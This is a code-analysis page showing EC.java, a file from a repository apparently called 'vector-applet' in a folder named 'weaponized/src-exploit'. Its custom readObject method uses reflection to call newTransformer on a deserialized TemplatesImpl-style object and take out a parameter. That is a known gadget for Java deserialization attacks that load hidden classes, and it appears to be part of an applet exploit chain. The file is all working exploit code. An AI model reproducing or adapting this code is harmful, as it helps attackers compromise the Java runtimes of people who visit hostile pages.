hackedteam/vector-applet

View on GitHub
weaponized/src-exploit/x/EC.java

Summary

Maintainability
A
2 hrs
Test Coverage
package x;

import java.io.File;
import java.io.IOException;
import java.io.Serializable;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.List;

/**
 * Encrypted Classes holder, duplicated here with functions to write during serialize.
 */
public class EC implements Serializable {

    public static Object t;
    
    private static final long serialVersionUID = 7184753337713309073L;

    transient List<File> files = new ArrayList<File>();

    public EC() {
    }
    
    public Class<?> getClass(String name) throws ClassNotFoundException {
        Method m;
        try {
            m = t.getClass().getMethod("getClass", new Class[] { String.class });
            return (Class<?>) m.invoke(t, name);
        } catch (Exception e) {
            throw new RuntimeException("x",e);
        }
    }
             
    private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException {
//        TemplatesImpl templatesImpl = (TemplatesImpl) in.readObject();
        Object templatesImpl = in.readObject();
        try {
            // This instantiates the ClassFindingTranslet
//            TransformerImpl impl = (TransformerImpl) templatesImpl.newTransformer();
            Object impl = templatesImpl.getClass().getMethod("newTransformer").invoke(templatesImpl);
            t = impl.getClass().getMethod("getParameter",String.class).invoke(impl, "x");
        } catch (Exception e) {
            throw new RuntimeException("x",e);
        } 
    }
    
}